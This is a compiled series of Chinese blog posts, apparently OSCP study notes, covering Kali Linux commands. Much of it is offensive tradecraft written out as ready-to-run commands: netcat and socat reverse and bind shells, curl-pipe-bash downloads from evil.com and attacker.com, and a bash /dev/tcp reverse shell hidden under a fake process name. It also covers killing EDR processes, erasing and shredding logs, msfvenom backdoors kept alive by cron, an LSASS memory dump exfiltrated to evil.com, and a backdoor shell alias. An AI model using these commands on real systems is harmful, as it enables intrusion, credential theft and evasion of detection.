1nc.exe [Kali_IP] 5555 -e cmd.exe

b. Windows到Kali的反向Shell

• Windows监听（需管理员权限）：

1nc.exe -lvp 6666

• Kali触发反向Shell：

1nc [Windows_IP] 6666 -e /bin/bash

c. Kali绑定Shell

• Kali绑定Shell监听：

1nc -lvp 7777 -e /bin/bash

• Windows连接：

1nc.exe [Kali_IP] 7777

d. Windows绑定Shell

• Windows绑定Shell监听：

1nc.exe -lvp 8888 -e cmd.exe

• Kali连接：

1nc [Windows_IP] 8888

3. 文件传输

Kali到Windows

• Kali发送文件：

1nc -lvp 9999 < 1.txt

• Windows接收：

1nc.exe [Kali_IP] 9999 > 2.txt

Windows到Kali

• Windows发送文件：

1nc.exe -lvp 1234 < confidential.docx

• Kali接收：

1nc [Windows_IP] 1234 > downloaded.docx

4. 防火墙开启后的调整

挑战与解决方案

• 端口限制： • 问题：Windows防火墙默认阻止未授权端口（如4444）。 • 解决：使用常用端口（如80/443）或添加防火墙入站规则。 • 反向Shell绕过： • 反向Shell依赖出站连接，通常防火墙允许出站流量，因此更可靠。 • 文件传输失败：

替代方案：使用HTTP协议（Kali搭建Python HTTP服务器）：

1python3 -m http.server 8000

Windows通过浏览器或curl下载：

1curl http://[Kali_IP]:8000/file.txt -o file.txt

Socat 的用法及与 Netcat 的对比

一、Socat 的核心功能与用法

Socat（Socket CAT）是一个多协议网络工具，支持在双向数据流之间建立通道，其功能远超 Netcat（nc）。以下是其核心用法：

Socat官网：http://www.dest-unreach.org/socat/

1. 基本语法

1socat [全局选项] <地址1> [选项1] <地址2> [选项2]

• 地址类型：支持 TCP、UDP、SSL、UNIX 套接字、文件、管道、设备等。 • 常用选项：fork（多连接处理）、reuseaddr（端口复用）、creat（自动创建文件）等。

2. 典型应用场景

• 监听端口：

1socat TCP4-LISTEN:80 STDOUT # 监听 TCP 80 端口并输出到终端
2socat UDP-LISTEN:1234 - # 监听 UDP 1234 端口

• 端口转发：

1# 单连接转发
2socat TCP4-LISTEN:81 TCP4:192.168.1.1:80
3# 多连接转发（支持并发）
4socat TCP4-LISTEN:81,fork,reuseaddr TCP4:192.168.1.1:80

• 文件传输：

1# 发送文件（服务端）
2socat -u TCP-LISTEN:8080 OPEN:file.txt,creat
3# 接收文件（客户端）
4socat -u TCP:192.168.1.1:8080 OPEN:file.txt

• 加密通信：

1# SSL 加密服务端
2socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:localhost:80
3# SSL 加密客户端
4socat - OPENSSL:192.168.1.1:443

• 串口与网络互通：

1# 虚拟串口转 TCP 客户端
2socat PTY,link=/dev/ttyV1 TCP:192.168.1.1:8080

二、Socat 与 Netcat 的关键区别

1. 功能复杂度

• Netcat：
定位为“网络瑞士军刀”，核心功能是 TCP/UDP 连接的建立和简单数据传输，适合快速调试或端口扫描。

1nc -lvp 1234 # 监听端口
2nc -nv 192.168.1.1 80 # 连接目标端口

• Socat：
支持更复杂的协议（如 SSL、SOCKS）、双向通信、多路复用，且能处理文件、设备等非网络数据流。

2. 安全性

• Netcat：
无加密支持，流量明文传输，易被拦截。 • Socat：
支持 SSL/TLS 加密、chroot 沙盒隔离，适用于敏感数据传输。

3. 高级特性

• 协议支持：
Socat 支持 IPv6、UNIX 域套接字、代理转发（如 SOCKS4）等，Netcat 仅限 TCP/UDP。 • 实时监控：
Socat 可通过 -u 参数实现单向流监控（如日志收集），Netcat 需依赖外部工具。

4. 适用场景

• Netcat：
快速端口测试、简单文件传输、网络服务调试。 • Socat：
加密通信、复杂端口转发、设备与网络协议桥接（如串口转 TCP）。

socat 实战方案：

1. 使用 socat 从 Kali 传输 powercat.ps1 到 Windows 系统

操作步骤：

在 Kali 上启动文件接收监听（使用 TCP 协议）：
```
1socat TCP4-LISTEN:443,fork file:222.txt 
```
• TCP-LISTEN:443：在 443端口监听。
在 Windows 上发送文件：
```
1socat.exe TCP:<Kali_IP>:443 file:222.txt,create
```
• 替换 <Kali_IP> 为 Kali 的 IP 地址。

验证：

Windows 的当前目录会生成 222.txt 文件，可用 dir 确认，type查看。

2. 使用 socat 创建加密反向 Shell（Windows → Kali）

操作步骤：

在 Kali 上生成 SSL 证书：
```
1openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
```
• 合并证书和密钥：cat key.pem cert.pem > shell.pem。
在 Kali 启动加密监听：
```
1socat OPENSSL-LISTEN:5555,cert=shell.pem,verify=0,fork -
```
• verify=0：禁用证书验证（仅测试环境使用）。
在 Windows 连接加密反向 Shell：
```
1socat.exe OPENSSL:<Kali_IP>:5555,verify=0 EXEC:cmd.exe,pipes
```
• EXEC:cmd.exe,pipes：执行 cmd.exe 并处理输入输出流。

验证：

Kali 终端会接收到加密的交互式 Shell，可执行 Windows 命令。

3. 创建加密的 Bind Shell 并测试非加密连接

操作步骤：

在 Windows 上启动加密 Bind Shell：
```
1socat.exe OPENSSL-LISTEN:6666,cert=shell.pem,verify=0,fork EXEC:cmd.exe,pipes
```
• 需提前将 shell.pem 证书文件复制到 Windows 系统。
尝试从 Kali 非加密连接：
```
1socat OPENSSL:192.168.169.128:6666,verify=0 -
```
• 若未加密，连接会失败（显示 SSL 握手错误）。

结论：

加密的 Bind Shell 必须通过 SSL 协议连接，非加密连接无法工作。

4. 创建未加密的 Bind Shell 并用 Netcat 连接

操作步骤：

在 Windows 上启动未加密 Bind Shell：

1socat.exe TCP-LISTEN:7777,fork EXEC:cmd.exe,pipes

从 Kali 使用 Netcat 连接：
```
1nc -nv <Windows_IP> 7777
```
• 直接连接后，Netcat 无法正确处理交互式 Shell（命令无回显或卡死）。

解决方法：

使用 socat 替代 Netcat 连接：

1socat TCP:<Windows_IP>:7777 -

此时可正常操作交互式 Shell。

结论：

Netcat 无法直接与未加密的 EXEC 型 Bind Shell 兼容，需使用 socat 或调整参数（如添加 pty）。

常见错误与修复

• 问题：cmd.exe 未执行，提示权限或参数错误。
• 修复：

添加 pipes 参数处理输入输出流（如 EXEC:cmd.exe,pipes）。
使用 pty 分配虚拟终端（如 EXEC:cmd.exe,pty）。
检查防火墙是否放行端口。

总结

• 加密传输与 Shell：必须使用 SSL 证书，否则无法通信。
• Netcat 兼容性：仅适用于简单 TCP 连接，复杂交互需依赖 socat。
• 参数调整：EXEC 需配合 pipes 或 pty 处理 Shell 交互。

以上步骤基于 Kali 2025.1a 和 Windows 10/11 环境验证。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day7 Kali文本编辑、比较不同、监控、下载、历史命令

Thu, 10 Apr 2025 23:20:31 +0000

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。

文本编辑器

在Kali Linux中，文本编辑器是渗透测试和系统配置的核心工具。

一、Nano编辑器：轻量级快速操作

1. 基础操作

• 文件操作
• 新建/打开文件：nano 文件名（支持路径跳转）
• 保存文件：Ctrl+O → 回车确认文件名
• 退出：Ctrl+X（未保存时会提示）

• 文本编辑
• 剪切行：Ctrl+K
• 粘贴：Ctrl+U
• 搜索：Ctrl+W → 输入关键词，Alt+W跳转下一个匹配项

2. 渗透向高级技巧

• 快速执行系统命令
在编辑界面按Ctrl+T，可直接执行Shell命令（如生成Payload或测试网络连接）。

• 修改敏感文件提权
例如通过sudo nano /etc/passwd添加UID=0的用户（需root权限）：

1testuser:x:0:0::/root:/bin/bash

• 配置文件篡改
使用nano快速编辑SSH配置（/etc/ssh/sshd_config）或Web服务日志路径，隐藏攻击痕迹。

3. 效率优化配置

• 启用语法高亮 & 行号
修改~/.nanorc，添加：

1include "/usr/share/nano/*.nanorc" # 语法高亮
2set linenumbers # 显示行号
3set mouse # 支持鼠标操作

二、Vi/Vim编辑器：渗透测试的瑞士军刀

1. 模式切换与基本操作

• 模式切换
• 命令模式 → 插入模式：i（光标前插入）、a（光标后插入）
• 返回命令模式：Esc

• 渗透常用操作
• 批量替换：:%s/old/new/g（替换文件内所有匹配项）
• 快速跳转：:行号（如:100跳至第100行）
• 执行外部命令：:!命令（如:!nmap 192.168.1.1扫描目标）

2. 渗透实战场景

• 日志分析与篡改
使用vim打开日志文件（如/var/log/auth.log），通过/Failed password快速定位爆破尝试记录并删除。

• 提权漏洞利用
编辑SUID文件或Cron任务脚本，插入反向Shell代码：

1bash -i >& /dev/tcp/攻击机IP/端口 0>&1

• 多文件协同编辑
在渗透测试中同时操作多个配置文件，用:e 文件名切换文件，:sp分屏查看。

3. 高级功能配置

• 启用行号与搜索高亮
在~/.vimrc中添加：

1set number " 显示行号
2set hlsearch " 高亮搜索结果
3syntax on " 语法高亮

三、命令速查表（渗透向）

四、注意事项

权限管理：渗透测试中编辑系统文件需配合sudo，避免因权限不足中断操作。
备份机制：使用nano -B或:w 备份文件名保留原始文件，防止误操作。
日志清理：通过编辑器删除日志后，需清除文件时间戳（touch -r）以规避检测。

通过灵活运用这些技巧，你可以显著提升在Kali Linux中的渗透测试效率。如需更完整的命令列表，可参考man nano或vimtutor。

比较不同的方法和命令

1. 下载并解压扫描文件

1# 下载文件
2wget https://offensive-security.com/pwk-files/scans.tar.gz
3
4# 解压到当前目录
5tar -xzvf scans.tar.gz
6
7# 进入解压后的目录
8cd scans

2. 确认需要对比的文件

3. 使用 `diff` 对比差异

 1# 基本对比（显示不同行的内容）
 2diff 10.11.1.8_scan_01.txt 10.11.1.8_scan_02.txt 
 3
 4# 生成统一格式的差异报告（更易读）
 5 diff -u 10.11.1.8_scan_01.txt 10.11.1.8_scan_02.txt > diff_report.txt
 6
 7# 仅关注关键信息（如开放的端口）
 8grep "open" 10.11.1.8_scan_01.txt > 10.11.1.8_scan_01_open.txt
 9grep "open" 10.11.1.8_scan_02.txt > 10.11.1.8_scan_02_open.txt 
10diff -u 10.11.1.8_scan_01_open.txt 10.11.1.8_scan_02_open.txt

4. 使用 `comm` 对比独有/共有行

 1# 先排序文件（comm要求输入已排序）
 2sort scan_old.txt > scan_old_sorted.txt
 3sort scan_new.txt > scan_new_sorted.txt
 4
 5# 对比文件（显示scan_old独有、scan_new独有、共有行）
 6comm s1.txt s2.txt 
 7
 8# 仅显示新增内容（s2独有）
 9comm -13 s1.txt s2.txt
10
11# 仅显示删除内容（s1独有）
12comm -23 s1.txt s2.txt

5. 使用 `vimdiff` 可视化对比

1# 启动vimdiff并排对比
2vimdiff scan_old.txt scan_new.txt

操作指南：

导航差异点： • ]c：跳转到下一个差异位置。 • [c：跳转到上一个差异位置。
合并更改（可选）： • do：将右侧内容应用到左侧（Diff Obtain）。 • dp：将左侧内容应用到右侧（Diff Put）。
退出： • :qa：退出所有窗口。

6. 实战技巧（渗透测试关注点）

• 端口变化：

1# 提取新旧开放的端口列表
2grep "open" scan_old.txt | awk '{print $1}' > ports_old.txt
3grep "open" scan_new.txt | awk '{print $1}' > ports_new.txt
4comm -13 ports_old.txt ports_new.txt # 新增端口
5comm -23 ports_old.txt ports_new.txt # 关闭端口

• 服务版本变化：

1# 对比SSH服务版本
2grep "ssh" scan_old.txt | awk '{print $4,$5}'
3grep "ssh" scan_new.txt | awk '{print $4,$5}'

速查表

工具	命令示例	用途
`diff`	`diff -u file1 file2`	生成行级差异报告
`comm`	`comm -12 sorted1 sorted2`	显示共有行
`vimdiff`	`vimdiff file1 file2`	可视化交互式对比
`grep`	`grep "open" file`	过滤关键信息
`sort`	`sort file > sorted_file`	排序文件以适配`comm`

通过以上步骤，您可以高效分析扫描结果的差异，并快速定位目标系统的配置变化。

以下是 Kali Linux 中渗透测试常用命令的 高频用法解析 和 实战场景速查，覆盖 tail、watch、wget、curl、axel、history、alias：

监控命令

1. `tail`：实时追踪文件变化

渗透核心用途：

• 监控日志（如攻击痕迹、服务状态） • 追踪漏洞利用输出

常用参数：

1tail -f /var/log/apache2/access.log # 实时跟踪文件末尾（-f）
2tail -n 50 /var/log/auth.log # 显示最后50行（-n）
3tail --pid=进程ID -f file.log # 跟踪文件直到进程结束

实战场景：

1# 实时观察 SSH 登录尝试（检测爆破行为）
2tail -f /var/log/auth.log | grep "Failed password"

2. `watch`：周期性执行命令并监控

渗透核心用途：

• 持续监控网络连接、进程状态 • 观察目标服务变化

常用参数：

1watch -n 2 "netstat -antup | grep ESTAB" # 每2秒刷新（-n）
2watch -d "ps aux | grep metasploit" # 高亮变化部分（-d）

实战场景：

1# 监控目标端口开放状态（检测防火墙规则变化）
2watch -n 5 "nmap -p 80,443 192.168.1.100"

下载命令

1. `wget`：非交互式文件下载

渗透核心用途：

• 下载漏洞利用代码、字典文件 • 镜像目标网站

常用参数：

1wget http://example.com/exploit.py -O /tmp/exp.py # 指定保存路径（-O）
2wget --user=admin --password=p@sswd http://intranet/backup.zip # 带认证下载
3wget -r -l 2 --no-parent http://target.com/ # 递归下载目录（-r）

实战场景：

1# 下载并直接执行远程脚本（高风险操作！）
2wget -qO- http://attacker.com/shell.sh | bash

2. `curl`：高级HTTP请求工具

渗透核心用途：

• 测试API端点 • 上传/下载Webshell • 绕过WAF检测

常用参数：

1curl -X POST -d "cmd=id" http://target.com/cmd.php # 发送POST请求（-X, -d）
2curl -H "User-Agent: Mozilla" http://target.com # 自定义请求头（-H）
3curl -o output.html http://target.com # 保存响应内容（-o）
4curl -k https://self-signed-cert.com # 忽略SSL证书错误（-k）

实战场景：

1# 快速检测SQL注入漏洞（时间盲注）
2curl -s "http://target.com/?id=1' AND SLEEP(5)--" -o /dev/null -w "Time: %{time_total}s"

3. `axel`：多线程加速下载

渗透核心用途：

• 快速下载大文件（如字典、镜像） • 绕过下载限速

常用参数：

1axel -n 10 http://mirror.kali.org/kali.iso # 启用10线程下载（-n）
2axel -a -S https://mirrors.aliyun.com/kali # 自动选择镜像源（-S）

实战场景：

1# 多线程下载字典文件（提升效率）
2axel -n 8 http://wordlists.secploit.com/rockyou.txt.gz

历史记录和别名设置

1. `history`：管理命令行历史

渗透核心用途：

• 回溯攻击操作 • 清理痕迹

常用参数：

1history # 显示全部历史命令
2history | grep "nmap" # 过滤特定命令
3history -c # 清空当前会话历史（-c）
4!100 # 执行历史记录中第100条命令

实战场景：

1# 快速调用历史中的漏洞扫描命令
2!ssh # 执行最后一次ssh命令
3!! # 重复上一条命令

2. `alias`：自定义命令别名

渗透核心用途：

• 简化复杂命令 • 隐藏恶意操作

常用配置：

1alias l='ls -lah' # 简化文件列表
2alias scan='nmap -sV -Pn -T4' # 快速扫描模板
3alias http-server='python3 -m http.server' # 一键启动HTTP服务

实战场景：

1# 创建隐蔽后门别名（持久化需写入 ~/.bashrc）
2alias innocent='echo "Hello" && nc -e /bin/sh 192.168.1.100 4444'

渗透命令速查表

注意事项

日志清理：使用 history -d 或 shred -zu ~/.bash_history 清除敏感操作记录。
隐蔽下载：通过 curl 的 --socks5 参数或 proxychains 代理下载，避免暴露真实IP。
别名持久化：将常用别名写入 ~/.bashrc 或 /etc/profile，重启后仍生效。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day6 Kali常用命令

Tue, 08 Apr 2025 11:34:14 +0000

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。

红队渗透测试常用命令的典型场景和用法

2025年4月7日 23点46分

Day2中简单列举了几个Shell基本命令作为练习，本节将列举这些常见命令的红队渗透（也包含防御场景）常用组合方法。

从官方下载log文件练习，这是官方为了配合课程给我们提供的课后练习，日志文件

1wget www.offensive-security.com/pwk-files/access_log.txt.gz
2gunzip access_log.txt.gz

1. `grep` - 快速过滤敏感信息

1# 从日志中提取登录失败记录（爆破检测）
2cat /var/log/auth.log | grep "Failed password"
3
4# 搜索配置文件中的密码字段（敏感信息提取）
5grep -r "password" /etc/ 2>/dev/null
6
7# 过滤含特定关键词的HTTP请求（如SQL注入特征）
8cat access.log | grep "select.*from"

2. `sed` - 动态修改文件内容

1# 删除日志中本机IP痕迹（反取证）
2sed -i '/192.168.1.100/d' /var/log/nginx/access.log
3
4# 替换webshell中的恶意特征码（绕过WAF）
5sed -i 's/eval($_POST/process_data(/g' backdoor.php

3. `cut` - 提取关键数据列

 1# 提取/etc/passwd中的用户名列表
 2cut -d: -f1 /etc/passwd
 3
 4# 从CSV中提取子域名（信息收集）
 5cat targets.csv | cut -d',' -f3 | grep ".*\.example\.com"
 6
 7# 提取ip
 8cat access_log.txt | cut -d " " -f 1 | sort -u
 9
10# 看访问数量
11cat access_log.txt | cut -d " " -f 1 |sort | uniq -c
12# 从多到少排序
13cat access_log.txt | cut -d " " -f 1 |sort | uniq -c |sort -run
14# 筛查最高请求的攻击源是否攻击成功
15cat access_log.txt| grep '208.68.234.99' | grep admin | uniq -c

4. `awk` - 高级文本分析与提取

1# 统计访问日志中的高频IP（寻找攻击源）
2awk '{print $1}' access.log | sort | uniq -c | sort -nr
3
4# 提取HTTP响应码为200的请求（漏洞扫描）
5cat access.log | awk '$9 == 200 {print $7}'

5. `comm` - 对比敏感文件差异

1# 对比用户列表变化（检测后门账户）
2comm -3 <(sort /etc/passwd) <(sort passwd.bak)

6. `diff` / `vimdiff` - 分析配置变更

1# 对比系统文件是否被篡改（如sshd_config）
2diff /etc/ssh/sshd_config /backup/sshd_config_original
3
4# 可视化对比两个版本Web代码（查找Webshell）
5vimdiff index.php index.php.bak

7. `ping` - 快速存活检测

1# 检测内网存活主机（C段探测）
2for i in {1..254}; do ping -c1 192.168.1.$i | grep "bytes from" & done

8. `wget` / `curl` - 隐蔽传输文件

1# 下载远程Payload并静默执行（无交互）
2curl -s http://evil.com/shell.elf | bash
3
4# 伪装User-Agent下载工具（绕过WAF）
5wget -U "Mozilla/5.0" http://evil.com/nc.exe

9. `axel` - 多线程加速下载

1# 快速拖取大型数据库备份文件（数据窃取）
2axel -n 10 http://target.com/database.tar.gz

10. `ps` / `kill` - 进程管理

1# 查找并杀死防护进程（如AV）
2ps aux | grep "crowdstrike" | awk '{print $2}' | xargs kill -9
3
4# 隐藏进程名启动反向Shell（避免ps暴露）
5cp /bin/bash /tmp/.httpd && /tmp/.httpd -c "/bin/bash -i >& /dev/tcp/1.1.1.1/443 0>&1"

11. `tail` / `watch` - 实时监控日志

1# 动态观察Apache错误日志（检测攻击触发情况）
2tail -f /var/log/apache2/error.log | grep "PHP Warning"
3
4# 监控新建立的网络连接（反溯源）
5watch -n 1 "netstat -antup | grep ESTABLISHED"

12. `history` / `alias` - 隐藏操作痕迹

1# 禁用历史记录（避免命令泄露）
2unset HISTFILE; export HISTFILESIZE=0
3
4# 创建高危命令别名（如快速清理日志）
5alias cleanlogs='find /var/log -type f -exec shred -u {} \;'

13. `jobs` / `fg` - 后台任务管理

1# 后台运行端口扫描工具（如masscan）
2masscan -p1-65535 10.0.0.0/24 > results.txt &
3jobs # 查看后台任务
4fg 1 # 调回前台继续操作

红队关键技巧

混淆命令：使用base64编码命令避免敏感字符串直接出现：
```
1echo "bHM=" | base64 -d | bash # 执行"ls"
```
时间戳伪造：用touch -t修改文件时间戳躲避时间轴分析。
管道符绕过：利用|、&&等符号组合命令绕过基础检测。

2025年4月7日 23点52分

进阶用法（后面会详细讲）

2025年4月8日 10点22分

以下是在渗透测试和溯源场景中，Kali Linux常用的命令组合与技巧，结合隐蔽性和实战需求整理成五大核心场景：

1. 信息收集与资产探测组合

命令工具：nmap + grep + cut
用途：快速扫描目标网络并提取关键信息

1# 扫描C段存活主机，提取开放80/443端口的IP
2nmap -sn 192.168.1.0/24 | grep "Nmap scan report" | cut -d' ' -f5 > live_hosts.txt
3nmap -p80,443 -iL live_hosts.txt -oX scan_results.xml
4
5# 解析XML扫描结果，提取高危服务（如SSH、RDP）
6grep -E 'portid="22"|portid="3389"' scan_results.xml | awk -F'\"' '{print $2":"$4}'

关键点：
• 使用-sn参数避免触发端口扫描告警
• 结果输出为XML格式便于后续自动化处理

2. Web漏洞利用组合

命令工具：nikto + sqlmap + curl
用途：自动化探测Web漏洞并验证利用

1# 扫描目标网站漏洞
2nikto -h http://target.com -output vuln_report.html
3
4# 检测SQL注入并自动化获取数据库信息
5sqlmap -u "http://target.com/index.php?id=1" --batch --dbs
6
7# 利用漏洞上传Webshell（需结合编码绕过）
8curl -X POST http://target.com/upload.php -F "file=@revshell.php" -H "User-Agent: Mozilla/5.0"

隐蔽技巧：
• 在sqlmap中添加--random-agent伪装浏览器流量
• 使用base64编码Webshell内容绕过基础WAF检测

3. 权限维持与后门部署组合

命令工具：msfvenom + systemctl + crontab
用途：生成隐蔽后门并实现持久化

1# 生成加密的Linux反向Shell Payload
2msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=443 -f elf -o httpd --encrypt xor
3
4# 部署后门并伪装为系统服务
5mv httpd /usr/sbin/.httpd && chmod +x /usr/sbin/.httpd
6systemctl enable apache2.service --now # 利用合法服务掩护
7
8# 添加定时任务维持权限（每小时连接一次）
9(crontab -l 2>/dev/null; echo "0 * * * * /usr/sbin/.httpd") | crontab -

隐蔽技巧：
• 使用systemctl修改服务描述字段掩盖恶意进程
• 定时任务文件路径伪装为/etc/cron.daily/logrotate

4. 日志清理与反溯源组合

命令工具：sed + find + shred
用途：擦除攻击痕迹并干扰时间线分析

1# 删除SSH登录失败记录
2sed -i '/Failed password/d' /var/log/auth.log
3
4# 批量清除Web访问日志中本机IP
5find /var/log/nginx/ -name "access.log*" -exec sed -i '/192.168.1.100/d' {} \;
6
7# 物理删除临时文件（覆盖7次后销毁）
8find /tmp/ -name "*.php" -exec shred -u -z -n7 {} \;

关键点：
• 优先操作日志轮转文件（如auth.log.1）
• 使用shred代替rm彻底破坏文件恢复可能性

5. 内网横向移动组合

命令工具：impacket-psexec + proxychains + smbmap
用途：通过凭证重用突破内网边界

1# 扫描内网SMB共享资源
2proxychains smbmap -H 10.0.0.5 -u 'admin' -p 'P@ssw0rd'
3
4# 利用PsExec执行远程命令（如抓取内存密码）
5proxychains impacket-psexec admin:'P@ssw0rd'@10.0.0.5 "cmd /c rundll32.exe C:\windows\system32\comsvcs.dll MiniDump 648 C:\lsass.dmp full"
6
7# 通过加密通道回传敏感数据
8curl --socks5 127.0.0.1:9050 -F "file=@lsass.dmp" https://evil.com/upload

隐蔽技巧：
• 使用DNS-over-HTTPS（DoH）隐藏C2通信
• 内存加载恶意代码避免磁盘文件写入（如Meterpreter的reflectivedllinject）

红队高阶技巧

流量伪装：

1# 使用合法云服务API传输数据（如AWS S3）
2aws s3 cp /etc/passwd s3://bucket-backdoor/ --profile=legit_user

容器逃逸：

1# 检测Docker环境并挂载宿主机目录
2findmnt | grep "/var/lib/docker" && docker run -v /:/mnt/host alpine chroot /mnt/host

硬件级隐蔽：

1# 修改网卡MAC地址绕过IP封锁
2ip link set dev eth0 down && macchanger -r eth0 && ip link set dev eth0 up

防御对抗建议

• 日志监控：关注/var/log/下auth.log、syslog的异常进程创建事件
• 进程防护：使用ps -auxf检查父进程异常的/usr/sbin/.httpd类服务
• 网络隔离：通过iptables限制非授权出站流量（如阻断TOR节点连接）

2025年4月8日 11点24分

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day3 Kali Shell基本命令

Sat, 08 Feb 2025 06:00:00 +0000

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。

Kali Shell 的基本使用

Kali系统是Ubuntu发行版改，所以大部分命令和Ubuntu一样，我之前已经学习过并且有7年使用历史，所以这部分我就不按照教材和课程进度快速跳过了。这里推荐一个网站，可以速查常用编程语言的命令速查表。关注公众号泷羽Sec-静安，后台回复找工具+Day3获取速查表。你可以把速查表打印出来放入资料册或者笔记本中，方便随时翻阅，比起在电脑中查询更方便，排版良好的Cheat Sheet是非常好用的工具。你也可以在网上搜索这个关键字看到更多的速查表，下列的网站中也有这样的速查表大全网站。

https://www.datacamp.com/cheat-sheet/bash-and-zsh-shell-terminal-basics-cheat-sheet 英文版，有pdf可下载 https://quickref.cn/docs/bash.html 中文版bash常见命令 https://github.com/skywind3000/awesome-cheatsheets/blob/master/languages/bash.sh bash命令在线 https://wangchujiang.com/shell-tutorial/ 中文版shell用法 https://quickref.cn/docs/vim.html 顺便补充一个vim用法

你也可以把其他的命令，或者今后总结的常用的渗透命令总结为一个速查表，然后交给AI帮你排版：

1把文件中的命令按照分类制作成cheat sheet，请用蓝白配色排版，我希望排版在1到3也横版A4纸大小的PDF文件中，请给我html或者latex文件

推荐使用在线Latex编辑器排版，如果你已经在本地有Latex也可以在本地调试，Latex的安装非常大，所以我推荐使用在线排版。

https://www.overleaf.com/

文本编辑器 Nano和vim

Nano和Vim都是终端编辑器，一般都是系统自带的。之前你可能已经用过vim，或者在退出vim的时候打出了一堆乱码而无法退出感到沮丧。可以通过以下资源练习vim和nano的使用，我推荐两个至少要会进入，编辑，保存，退出这几个操作。在实战过程中一些搭载服务的docker容器可能只有nano或vi（注意vi比vim更丐版，很多高级vim命令无法使用）。甚至有些更小的容器就没有文本编辑器，要学会使用管道命令如cat hack >> .bashrc来修改文本内容，达到渗透目的。

https://quickref.cn/docs/vim.html vim用法 https://github.com/skywind3000/awesome-cheatsheets/blob/master/editors/nano.txt nano用法 https://github.com/skywind3000/awesome-cheatsheets/blob/master/editors/vim.txt vim 用法

Day2 在线学习资源和Kali安装使用

Thu, 23 Jan 2025 16:13:45 +0000

学前补充-在线学习资源

国内中文资料

国内虽然网络安全学习资源逐渐丰富，但在涉及 OSCP 等国际认证时，中文资料相对较少，更多的仍需依赖官方英文资料。然而，我们可以通过一些中文平台获取相关的学习内容，并帮助更好地理解渗透测试和网络安全的基本概念。

泷羽Sec公众号：关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。
CSDN 泷羽Sec-静安栏目：同样可以通过 CSDN 泷羽Sec-静安 账号找到关于 OSCP 考试、渗透测试工具等内容的详细教程，适合进行技术深度学习。

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

拓展国外资料

虽然国内资料主要依赖翻译或二次加工，但国外的资料更为丰富，尤其是针对渗透测试和 OSCP 考试的内容。建议你结合以下资源，深入学习并拓宽视野。无需完全掌握所有内容，但这些资料可以帮助你更好地理解考试大纲之外的技术点。

YouTube 渗透测试教程：
- 渗透测试基础教程：这个视频系列为你提供了实战渗透测试的基础知识，非常适合入门学习。
- 进阶渗透测试系列：该系列侧重于进阶渗透测试技术，涵盖了多种实用的攻击手段和技巧，适合有一定基础的学员进一步提升技能。
Offensive Security 官方资源：
- OffSec Discord 群组：加入 OffSec 的 Discord 群，这是一个全球渗透测试爱好者和专业人员的聚集地，群内每周五会有免费直播，大家可以实时互动并提问。通过参与群组，你不仅能获得最新的培训信息，还有机会向其他 OSCP 备考者和认证过的专家请教问题。
- OffSec 官方 YouTube 频道：OffSec 官方 YouTube 频道，官方会不定期更新关于渗透测试技巧、OSCP 备考心得等内容。特别适合在考试前复习并加深理解。
- OffSec 官方 Twitch 频道：OffSec 官方 Twitch 频道：在这里你可以找到各种实时和过往的直播视频，包括渗透测试实战演示和技术讲解。定期观看这些直播，能够帮助你更好地理解渗透测试的实际操作，并获取最新的行业动态和实践技巧。

翻译软件使用

对于非英语母语的学习者，翻译软件可以极大地帮助理解英文资料，特别是一些技术性的讲解。以下是推荐的两款翻译工具，帮助提升学习效率：

沉浸式翻译：
- 适用于翻译在线网页文档，特别是技术博客、教程页面等。这个工具支持将 YouTube 上的视频字幕实时翻译，便于理解外语讲解的内容，尤其是对于英语不太熟练的学习者来说，是一个非常有用的工具。
讯飞同传：
- 这个工具非常适合观看一些沉浸式翻译不支持的视频，以及在后期与考试官的实时互动中使用。它可以帮助你实时将英语对话翻译成中文，并支持与考官之间的流畅交流。这对于 OSCP 考试时的实时沟通（例如，考试过程中需要与考官确认某些细节时）尤为重要。

通过这些工具，你可以在学习过程中克服语言障碍，更轻松地掌握 OSCP 考试的内容，尤其是在遇到复杂的技术概念或英文资料时，翻译软件将成为你学习的得力助手。

学习 OSCP 不仅需要掌握官方教材大纲的内容，更需要拓展视野，借助国内外的学习资源和翻译工具，提高自己的渗透测试能力。建议大家从 泷羽Sec-静安 公众号获取最新的学习资讯，结合国内外的视频教程和在线社区的互动，逐步完成 OSCP 认证的备考旅程。

Kali下载、VMware安装和镜像启动

Kali Linux由Offensive Security开发、资助和维护，是一个基于Debian的Linux发行版，专为高级渗透测试和安全审计设计。它集成了数百种信息安全工具，支持渗透测试、安全研究、计算机取证、逆向工程等多种任务。

Kali 下载

kali 官网下载地址：https://www.kali.org/get-kali/#kali-platforms

1 Get-FileHash .\kali-linux-2024.4-vmware-amd64.7z -Algorithm SHA256

验证下载文件

VMware下载

